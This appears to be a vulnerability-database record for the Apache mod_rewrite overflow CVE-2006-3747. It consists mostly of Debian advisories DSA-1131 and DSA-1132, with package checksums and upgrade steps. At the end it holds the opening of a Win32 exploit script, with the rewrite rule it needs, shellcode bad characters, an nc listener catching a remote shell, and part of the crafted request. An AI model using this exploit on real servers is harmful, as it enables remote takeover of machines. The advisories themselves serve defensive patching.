4dd93405f96d8a1504403b5e807ed11d\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 117584 c02517bf4a19a576ceb5eb53788b8ddb\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_m68k.deb\n Size/MD5 checksum: 250068 f9858a08d86d3c5da03ce9ab5742c807\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 33492 99198a05154084edcf0a023b4178c174\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 807540 b5be0b94c36ef91ad37f8e97ee38da6b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 217966 40962c3bb0de39504e18a3e4d17960d4\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 213184 17b42ce494efe8d695083b65c18bd04f\n 
http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 217340 af8e8d55645e3f8515838cc6a4d0b96a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 167712 62bcc19fbe039422058de75fac9ef8a2\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 168456 97347f55c5ca750159492a5e9fef0f05\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 103016 7dfdbeb967d4db76535e326fe3bbe831\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 134456 fefc232dee0333abe758f480922e485a\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_mips.deb\n Size/MD5 checksum: 286508 e450f3a5c862321728f126fd27e67da8\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 33492 a0beae9521a8681328ed01833936c7e6\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 807356 efa828902d16f408dc2fb75344a02484\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 217238 f61a494fe69366f8f0f319ec622c125d\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 212602 1e168ac088ef73b5a9ae213eaed0e65b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 216474 4da5c94813eb4c75e4c39e464b459286\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 167712 91d4f8ca1a018c1d772d2436a40c264a\n 
http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 168454 810be6456b1b49e29c2ad063677df5d7\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 102908 4053b03ba06284397e0a2e049ac0b07e\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 134504 4cf1d17baaceacbd49aff1a5f0386eb9\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_mipsel.deb\n Size/MD5 checksum: 287146 327a38414b6477d2bfc899b6c36814a4\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 33488 a02c59618834f05f05875bfb44db86a8\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 856080 7f25f6e8e6e6861106e349f49de39f3f\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 214658 4542ef6b2b9b2cad21c9b43cc090cc20\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 209732 a77570da8616c950a61c3e1f1774d263\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 213720 0187a654fc3972354c4b1ce9f25b298e\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 167700 23b513fe1438e05bfb285c6b2ba5fa88\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 168438 2fdbfc52471761f05ac81c88104df718\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 102074 e3e2f1cce29967a7f16d482c5a12f31e\n 
http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 134326 a065ca58466cb424e6fdecf4916a34ab\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_powerpc.deb\n Size/MD5 checksum: 272016 1036f4767ca54dcf7f9ea8a0ccd7219b\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 33484 be5320d7ff7f2535f2c2afcc1c1a0017\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 836920 0217fc29e0cd0c73ffc16321ac76ee67\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 223934 b8fe548deef75a8474c513ffeaef612b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 219814 03b24d5271b0d0392de3cae6a8b2cddc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 223316 b19825c6436769e45e9ff4b304893e0a\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 167674 b927beaf64fcf061278749e9112f606b\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 168406 2a691c0d5a113e67dbe4428f33850b55\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 95882 f4f2d57ef253b639334593daee4ea458\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 145992 524ec24014483b5380e1f498fc96eb71\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_s390.deb\n Size/MD5 checksum: 275226 812a50d7371049f438c8469dd72aaab7\n\n Sun Sparc architecture:\n\n 
http://security.debian.org/pool/updates/main/a/apache2/apache2_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 33492 e1759ef13bc51722b31ac10f9469ab11\n http://security.debian.org/pool/updates/main/a/apache2/apache2-common_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 802626 7936568d0f0220d40a0c24c020188e92\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-perchild_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 205614 75b026656494f526a4c53c7202ef4a85\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-prefork_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 200878 a9195c31cdba9cd787cad14eba216719\n http://security.debian.org/pool/updates/main/a/apache2/apache2-mpm-worker_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 204536 f0f6b6b0b5e4222e35deb55b955c1241\n http://security.debian.org/pool/updates/main/a/apache2/apache2-prefork-dev_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 167688 1f9b82c2aa5ef014de1a00279fba8acc\n http://security.debian.org/pool/updates/main/a/apache2/apache2-threaded-dev_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 168428 1055661a5018ca3698a508dac343a5ef\n http://security.debian.org/pool/updates/main/a/apache2/apache2-utils_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 91002 a2c433609f36de5d6d0e8ae5ad367fb2\n http://security.debian.org/pool/updates/main/a/apache2/libapr0_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 123598 5739e26b7619a2a36a0541288b45e91a\n http://security.debian.org/pool/updates/main/a/apache2/libapr0-dev_2.0.54-5sarge1_sparc.deb\n Size/MD5 checksum: 260480 d21565096a339f3e4cbff58cf5deb352\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show 
<pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2006-08-01T00:00:00", "published": "2006-08-01T00:00:00", "id": "DEBIAN:DSA-1132-1:6E37C", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00220.html", "title": "[SECURITY] [DSA 1132-1] New apache2 packages fix buffer overflow", "type": "debian", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:24:34", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3747"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1131-1 security@debian.org\nhttp://www.debian.org/security/ Steve Kemp\nAug 1st, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : apache\nVulnerability : buffer overflow\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2006-3747\nCERT advisory : VU#395412\nDebian Bug : 380231\n\nMark Dowd discovered a buffer overflow in the mod_rewrite component of\napache, a versatile high-performance HTTP server. 
In some situations a\nremote attacker could exploit this to execute arbitrary code.\n\nFor the stable distribution (sarge) this problem has been fixed in version 1.3.33-6sarge2.\n\nFor the unstable distribution (sid) this problem will be fixed shortly.\n\nWe recommend that you upgrade your apache package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2.dsc\n Size/MD5 checksum: 1119 8188c2fe660d475970139af295b07b86\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2.diff.gz\n Size/MD5 checksum: 372930 40c5ca3d91d1307a191915459bc94237\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33.orig.tar.gz\n Size/MD5 checksum: 3105683 1a34f13302878a8713a2ac760d9b6da8\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.33-6sarge2_all.deb\n Size/MD5 checksum: 334562 a6a506713c09c27143feffe738aed3f9\n http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.33-6sarge2_all.deb\n Size/MD5 checksum: 1332888 f24fa9421e8dc9acec2467b58468f2dd\n http://security.debian.org/pool/updates/main/a/apache/apache-utils_1.3.33-6sarge2_all.deb\n Size/MD5 checksum: 212626 b9a5198ee442212cdd248be8827400a1\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 428152 a58caae837e1025d97cf44bf8fb23f0f\n 
http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 904242 ce2a0e4b97c1926dafdf31e589883995\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 9223072 182f1789104e294f72fede75dc13b875\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 569406 185346b21b2adbc248a06f689f094b97\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_alpha.deb\n Size/MD5 checksum: 542576 dfe389cdb48d38ee2a27a3a622a6c6e0\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_alpha.deb\n Size/MD5 checksum: 505050 36759af8debeceeebdd083a337e590cb\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 401466 6d45b8e9a23382f6b2eadc28af28e4a4\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 876652 7474a08ccd74235787761b8e1ffe8c0e\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 9162572 b55d8df232edbd900372fe339a065fd1\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 524410 41142b30d22c99476977c339cf071504\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_amd64.deb\n Size/MD5 checksum: 513708 5377d3aa2ad92e07db2654d3fd3761d1\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_amd64.deb\n Size/MD5 checksum: 492544 2d15619f2db2d39d6abdaf25574fbf4c\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 384260 7785f5fa4d814bd1a1ec946fe007ec53\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_arm.deb\n 
Size/MD5 checksum: 841372 83ed59ba296d64b5b6731c3a57902810\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 8985914 50fc722807a399105950b15e5eaba3b3\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 495910 f7d7a9218c3bdabbf0982b3ec563bca6\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_arm.deb\n Size/MD5 checksum: 489556 7645d9195f00f4bf0c655eefaf971dff\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_arm.deb\n Size/MD5 checksum: 479280 e689e83904766cf209049c39fe3ee2d1\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 386664 0f0192626abd5a456bf7b6d43f9f1708\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 860158 60891f21e526885833f7f7fcf43c92e4\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 9124844 9d2e020813d5298c3f4d62dcd8ec6aaa\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 504860 a084ffd32a38948db9dd0692ead50eeb\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_i386.deb\n Size/MD5 checksum: 493690 c442e0c156f98044c20a665d989aeca0\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_i386.deb\n Size/MD5 checksum: 486804 3862e6781f044fc2c4ae24170f47fe6f\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 463372 13eb11e0de167d54b6606605ae1ff0f6\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 971834 2be725f2e6b84c10c512a0d804480e33\n 
http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 9355772 3b5d28d3d2531719d46c23920dd3e94c\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 627356 247a7da511dae2d5e698f2b424fe24c5\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_ia64.deb\n Size/MD5 checksum: 585922 aa5d4b2f9bcefe026da9168170e0c819\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_ia64.deb\n Size/MD5 checksum: 532826 9b9c3b43b6e85e92dd2c064871f7d9f3\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 406614 50c84b8682cd3b8af4e0eceaf7fd505a\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 905560 b02464bd2a9c5ca732e0c4f9208baee0\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 9100908 4516c9ad78527b3cb2be9daef76e9566\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 536024 e8ab5a278d1424ef9d68c155ae3a7ab8\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_hppa.deb\n Size/MD5 checksum: 518824 c6befb0053d4ed7daa9e9f3d1538bbb6\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_hppa.deb\n Size/MD5 checksum: 508750 6beec32a45b93df126f4973619c6076a\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 371072 d4f978e09502b619b7933e23290eaf5e\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 847234 8ca3d2d72183081217ae742327dd49f7\n 
http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 8973668 e6614fd4445efa2a29002d5f02d0b7c5\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 448692 e2024a331a75dabd3ff86927a1883cbc\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_m68k.deb\n Size/MD5 checksum: 477360 43f62ac274ccd93160d1db6d3110ebe6\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_m68k.deb\n Size/MD5 checksum: 489432 df5d49e0e858809966e4395cdfcab073\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 403276 4ff63b289978627f3db22de263e158ef\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 851592 3e0d11bf481c1378ff776062dc2eed70\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 9048564 aa4a667fdc83d41e739b69c949967929\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 485152 0672cc250050d8e0e571ced7cb4420a0\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_mips.deb\n Size/MD5 checksum: 509872 09572aa1dd63bd7b1bff9b61d5752358\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_mips.deb\n Size/MD5 checksum: 443532 6efd073b42b13599960f29ff9263892a\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 403652 6906feb21ddb7af2a5ec9d4c2ccd874c\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 849942 5786e24b7849df4eea36f3d3da80a82a\n 
http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 9054052 f0d853c8399534429fcd2a3463016ef1\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 485376 9001e3d37ac660635946eb066e50ec78\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_mipsel.deb\n Size/MD5 checksum: 510664 398e615c936d6e72bb443ce3550e57e2\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_mipsel.deb\n Size/MD5 checksum: 443422 e3a6f0ca68df1d8e8f26eef8f23b2822\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 398666 29de2415f45cd033d04c28be500664ee\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 921400 c36acb601638cb0a9961a2f5d95fcb28\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 9252458 aa5f5cdc62365a6951cb6a67e005dc34\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 515350 0d654fea1e92be4c2bb1375b6a51c060\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_powerpc.deb\n Size/MD5 checksum: 510372 15269ec946e59741172a69c8e7ea7557\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_powerpc.deb\n Size/MD5 checksum: 490708 2b1e1ae12a9cb2e8f59b6b8b219d7f9e\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 403204 73201862887af010def1edf24d22594d\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 868450 b84df926a3235d152d8f7f35aa3394ae\n 
http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 9183050 1cf5c335b2cf863898c0c84e4e150776\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 490090 b361f3cf52b919b5e92d96f92a77270a\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_s390.deb\n Size/MD5 checksum: 514442 d3374e5f0d5cb468409795a1a7c9b8b3\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_s390.deb\n Size/MD5 checksum: 460466 bf56d745cf3b78e3ade0204a718417c6\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/a/apache/apache_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 385534 020faf78c7c61702c94d10eb03a07e37\n http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 849304 2cffd052a21ba9306ebadf4af2f6b734\n http://security.debian.org/pool/updates/main/a/apache/apache-dbg_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 9046234 f32d81e7736df5b65bf9912506b03466\n http://security.debian.org/pool/updates/main/a/apache/apache-perl_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 504168 e3a5510199db8f05f5a6f3028b82ef11\n http://security.debian.org/pool/updates/main/a/apache/apache-ssl_1.3.33-6sarge2_sparc.deb\n Size/MD5 checksum: 491970 4f9732af9bcf8e6ecc54cb24f65b7d0b\n http://security.debian.org/pool/updates/main/a/apache/libapache-mod-perl_1.29.0.3-6sarge2_sparc.deb\n Size/MD5 checksum: 490256 9c6e61c66d2f8641680f6f7dfe7316fe\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' 
and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2006-08-01T00:00:00", "published": "2006-08-01T00:00:00", "id": "DEBIAN:DSA-1131-1:123B5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00219.html", "title": "[SECURITY] [DSA 1131-1] New apache package fix buffer overflow", "type": "debian", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache mod_rewrite (Windows x86) - Off-by-One Remote Overflow", "edition": 1, "published": "2007-04-07T00:00:00", "title": "Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-3747"], "modified": "2007-04-07T00:00:00", "id": "EXPLOITPACK:6E3090CD46CEEE08D52992589E824D90", "href": "", "sourceData": "#!/bin/sh\n# Exploit for Apache mod_rewrite off-by-one(Win32).\n#\n# by axis <axis@ph4nt0m>\n# http://www.ph4nt0m.org\n# 2007-04-06\n#\n# Tested on Apache 2.0.58 (Win32)\n# Windows2003 CN SP1\n#\n# Vulnerable Apache Versions:\n# * 1.3 branch: >1.3.28 and <1.3.37\n# * 2.0 branch: >2.0.46 and <2.0.59\n# * 2.2 branch: >2.2.0 and <2.2.3\n#\n#\n# Vulnerability discovered by Mark Dowd.\n# CVE-2006-3747\n# \n# first POC by jack <jack\\x40gulcas\\x2Eorg>\n# 2006-08-20\n# http://www.milw0rm.com/exploits/2237\n#\n#\n# \n# to successfully exploit the vuln,there are some conditions\n# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html\n# \n# \n# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat\n# \n# for more details about the vuln please see:\n# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded\n# \n# \n# no opcodes needed under windows!\n# it will directly run our shellcode\n# \n# my apache config file\n# [httpd.conf]:\n# RewriteEngine on\n# RewriteRule 1/(.*) $1\n# RewriteLog \"logs/rewrite.log\"\n# RewriteLogLevel 3\n# \n# 
\n# Usage:\n# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141\n# mod_rewrite apache off-by-one overflow\n# \n# [axis@opensystemX axis]$ nc -vv -n -l -p 1154\n# listening on [any] 1154 ...\n# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077\n# Microsoft Windows [\u00a1\u00e3?\u00a1\u00c0? 5.2.3790]\n# (C) \u00a1\u00e3?\u00a8\u00a8\u00a1\u00a7?\u00a8\u00b4\u00a8\u00aeD 1985-2003 Microsoft Corp.\n# \n# D:\\Apache\\Apache2>exit\n# exit\n# sent 5, rcvd 100\n# \n# \n# \n# shellcode \u00b5\u00c4badchar\u00a3\u00ac\u00ce\u00d2\u00d5\u00e2\u00c0\u00ef\u00d3\u00c3\u00b5\u00c4\u00a3\u00ac\u00c6\u00e4\u00ca\u00b5\u00b2\u00bb\u00d0\u00e8\u00d2\u00aa\u00c4\u00c7\u00c3\u00b4\u00b6\u00e0\n# \u00ce\u00d2\u00b8\u00fa\u00b5\u00bd\u00c1\u00bd\u00b8\u00f6badchar\u00ca\u00c7 0x3f\u00ba\u00cd 0x0b \u00c6\u00e4\u00cb\u00fb\u00b6\u00bc\u00ca\u00c7\u00d2\u00d4\u00c7\u00b0\u00c9\u00fa\u00b3\u00c9shellcode\u00cf\u00b0\u00b9\u00df\u00d0\u00d4\u00b1\u00a3\u00c1\u00f4\u00b5\u00c4\n# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b\n#\n\n\necho -e \"mod_rewrite apache off-by-one overflow\"\n\n\nif [ $# -ne 1 ] ; then\n echo \"Usage: $0 webserver\"\n exit\nfi\n\nhost=$1\n\n#use ldap:// to trigger the vuln, \"Ph4nt0m\" is any arbitrary string\necho -ne \"GET /1/ldap://ph4nt0m/`perl -e 'print \"Ph4nt0m\"x5'`\\ \n# %3f to trigger the vuln\n%3fA%3fA%3f\\ \n#string \"CCCC..\" is any arbitrary string, use %3f to trigger the vuln\n#%90 is the machine code 